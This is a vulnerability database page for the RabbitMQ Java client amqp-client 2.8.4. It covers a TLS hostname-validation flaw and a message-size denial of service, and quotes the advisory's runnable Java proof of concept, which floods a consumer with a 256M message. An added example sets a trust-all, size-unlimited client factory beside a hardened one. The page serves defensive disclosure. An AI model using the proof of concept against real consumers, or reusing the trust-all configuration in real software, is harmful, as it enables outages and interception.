Lookup for vulnerable packages by Package URL.
| Purl | pkg:maven/com.rabbitmq/amqp-client@2.8.4 |
| Type | maven |
| Namespace | com.rabbitmq |
| Name | amqp-client |
| Version | 2.8.4 |
| Qualifiers | |
| Subpath | |
| Is_vulnerable | true |
| Next_non_vulnerable_version | 5.18.0 |
| Latest_non_vulnerable_version | 5.18.0 |
| Affected_by_vulnerabilities | 2 (listed below) |

Affected vulnerability 0

| url | VCID-cuf7-182f-9ubm |
| vulnerability_id | VCID-cuf7-182f-9ubm |
| summary | Improper Certificate Validation. Pivotal Spring AMQP, 1.x versions prior to 1.7.10 and 2.x versions prior to 2.0.6, expose a man-in-the-middle vulnerability due to lack of hostname validation. A malicious user that has the ability to intercept traffic would be able to view data in transit. |
| references | |
| fixed_packages | |
| aliases | CVE-2018-11087, GHSA-w4g2-9hj6-5472 |
| risk_score | 3.1 |
| exploitability | 0.5 |
| weighted_severity | 6.2 |
| resource_url | http://public2.vulnerablecode.io/vulnerabilities/VCID-cuf7-182f-9ubm |

Affected vulnerability 1

| url | VCID-ktt4-hm4k-9qcf |
| vulnerability_id | VCID-ktt4-hm4k-9qcf |
| summary | RabbitMQ Java client's Lack of Message Size Limitation leads to Remote DoS Attack (advisory text follows) |

### Summary
`maxBodyLength` was not enforced when receiving Message objects. An attacker can simply send a very large message; the client buffers the whole body in the consumer's heap, which exhausts memory and triggers an OutOfMemoryError.
### PoC
#### RabbitMQ
* Use RabbitMQ 3.11.16 as the broker and raise its maximum message body size to 512M (it only needs to be larger than the Consumer's heap)
* Start RabbitMQ
#### Producer
* Build a String of length 256M and send it to the Consumer
```
package org.springframework.amqp.helloworld;

import org.springframework.amqp.core.AmqpTemplate;
import org.springframework.context.ApplicationContext;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;

public class Producer {
    public static void main(String[] args) {
        // HelloWorldConfiguration (not reproduced in the advisory) wires the
        // connection factory, the template and the sample queue.
        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class);
        // Double the string 28 times: 2^28 = 268,435,456 characters (256M).
        String s = "A";
        for (int i = 0; i < 28; ++i) {
            s = s + s;
            System.out.println(i);
        }
        // Publish to the template's default exchange/routing key (the sample queue).
        amqpTemplate.convertAndSend(s);
        System.out.println("Send Finish");
    }
}
```
#### Consumer
* First set the heap size to 128M (for example `-Xmx128m`)
* Read the message sent by the Producer from the MQ and print its length
```
package org.springframework.amqp.helloworld;

import org.springframework.amqp.core.AmqpTemplate;
import org.springframework.amqp.core.Message;
import org.springframework.context.ApplicationContext;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;

public class Consumer {
    public static void main(String[] args) {
        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class);
        // Single poll of the sample queue. With a 128M heap the 256M body
        // cannot be buffered and the receive fails with an OutOfMemoryError.
        Object o = amqpTemplate.receiveAndConvert();
        if (o != null) {
            String s = o.toString();
            System.out.println("Received Length : " + s.length());
        } else {
            System.out.println("null");
        }
    }
}
```
#### Results
* Run the Producer first, then the Consumer
* The Consumer throws an OutOfMemoryError
### Impact
Applications that consume messages with the RabbitMQ Java client can be subjected to a denial-of-service attack: a single oversized message is enough to exhaust the consumer's memory.
| references | |
| fixed_packages | |
| aliases | CVE-2023-46120, GHSA-mm8h-8587-p46h |
| risk_score | null |
| exploitability | null |
| weighted_severity | null |
| resource_url | http://public2.vulnerablecode.io/vulnerabilities/VCID-ktt4-hm4k-9qcf |

| Fixing_vulnerabilities | |
| Risk_score | 3.1 |
| Resource_url | http://public2.vulnerablecode.io/packages/pkg:maven/com.rabbitmq/amqp-client@2.8.4 |
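Both records above come down to two settings on the client's `ConnectionFactory`: hostname verification for the TLS connection (the CVE-2018-11087 class of issue) and a ceiling on the inbound message body (CVE-2023-46120). The following is an added example, not code from the advisories or from the RabbitMQ project, showing the vulnerable shape beside a hardened consumer. It assumes amqp-client 5.18.0 or later on the classpath (the version that introduced `setMaxInboundMessageBodySize`; `enableHostnameVerification` is absent from 2.8.4 as well), a broker speaking TLS on port 5671, a PKCS12 trust store at the path given, and the queue name, credentials and 8 MiB ceiling, which are all illustrative:

```java
import com.rabbitmq.client.Channel;
import com.rabbitmq.client.Connection;
import com.rabbitmq.client.ConnectionFactory;
import com.rabbitmq.client.DeliverCallback;

import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManagerFactory;
import java.io.FileInputStream;
import java.security.KeyStore;

// Added example: hardened RabbitMQ consumer (not the advisory's or project's code).
public class HardenedRabbitConsumer {

    // Assumed application-specific ceiling; the library default is 64 MiB.
    // Pick the largest body the consumer legitimately has to accept.
    static final int MAX_BODY_BYTES = 8 * 1024 * 1024;

    // The vulnerable shape the two advisories describe: useSslProtocol() with no
    // arguments installs a trust-all TrustManager and never checks the host name,
    // and no inbound body-size limit is set, so a single large message is buffered
    // in full on the consumer heap.
    static ConnectionFactory legacyFactory() throws Exception {
        ConnectionFactory f = new ConnectionFactory();
        f.setHost("rabbit.example.internal");   // assumed host
        f.setPort(5671);
        f.useSslProtocol();                      // trust-all, no hostname verification
        return f;                                // no setMaxInboundMessageBodySize(...)
    }

    // Hardened shape: chain validation against an explicit trust store, hostname
    // verification bound to the configured host, and a hard cap on inbound bodies.
    static ConnectionFactory hardenedFactory(String trustStorePath, char[] trustStorePassword) throws Exception {
        KeyStore trust = KeyStore.getInstance("PKCS12");
        try (FileInputStream in = new FileInputStream(trustStorePath)) {
            trust.load(in, trustStorePassword);
        }
        TrustManagerFactory tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init(trust);
        SSLContext ctx = SSLContext.getInstance("TLSv1.2");
        ctx.init(null, tmf.getTrustManagers(), null);

        ConnectionFactory f = new ConnectionFactory();
        f.setHost("rabbit.example.internal");    // assumed host
        f.setPort(5671);
        f.setVirtualHost("/");
        f.setUsername("consumer");               // assumed credentials
        f.setPassword("change-me");
        f.useSslProtocol(ctx);                   // validate the server chain against our trust store
        f.enableHostnameVerification();          // the certificate must match the host we dialled
        f.setMaxInboundMessageBodySize(MAX_BODY_BYTES); // oversized bodies are refused, not buffered
        return f;
    }

    public static void main(String[] args) throws Exception {
        ConnectionFactory factory = hardenedFactory("/etc/app/rabbit-truststore.p12", "change-me".toCharArray());
        try (Connection conn = factory.newConnection();
             Channel ch = conn.createChannel()) {
            ch.queueDeclare("work", true, false, false, null);   // assumed queue name
            ch.basicQos(16);   // also bound how many unacked deliveries can be in flight
            DeliverCallback onDeliver = (consumerTag, delivery) -> {
                System.out.println("received " + delivery.getBody().length + " bytes");
                ch.basicAck(delivery.getEnvelope().getDeliveryTag(), false);
            };
            ch.basicConsume("work", false, onDeliver, consumerTag -> { });
            Thread.sleep(60_000);   // keep the consumer alive for the demonstration
        }
    }
}
```

With the ceiling in place a delivery larger than `MAX_BODY_BYTES` is refused by the client during frame assembly rather than allocated on the heap, so the PoC above no longer ends in an OutOfMemoryError; the consumer should still expect the connection to be torn down and reconnect. The client-side cap complements, not replaces, the broker's own `max_message_size` setting in `rabbitmq.conf`: the broker limit protects the broker and every other consumer, the client limit protects this process against a broker whose limit is set higher than its heap, as in the PoC.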